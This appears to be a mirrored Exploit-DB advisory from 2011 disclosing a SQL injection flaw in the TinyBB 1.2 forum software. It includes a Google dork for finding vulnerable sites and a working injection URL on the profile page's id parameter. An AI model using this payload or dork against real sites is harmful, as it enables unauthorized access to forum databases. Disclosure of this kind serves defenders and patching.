TinyBB 1.2 – SQL Injection - 体验盒子

作者： Aodrulez

日期： 2011-01-10

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/15961/

+-------------------------------+
| TinyBB 1.2 SQLi Vulnerability |
+-------------------------------+



Vulnerable Web-App : TinyBB 1.2
Vulnerability: SQL Injection.
Author : Aodrulez.
Email: f3arm3d3ar@gmail.com
Google-Dork: "TinyBB 2011 all rights reserved"
Tested on: Ubuntu 10.04

+---------+
| Exploit |
+---------+

TinyBB Version 1.2 is vulnerable to SQLi.

http://127.0.0.1/index.php?page=profile&id=' or 'a'='a


+-------------------+
| Greetz Fly Out To |
+-------------------+
 

1] Amforked(): My Mentor.
2] The Blue Genius : My Boss.
3] www.orchidseven.com
4] www.malcon.org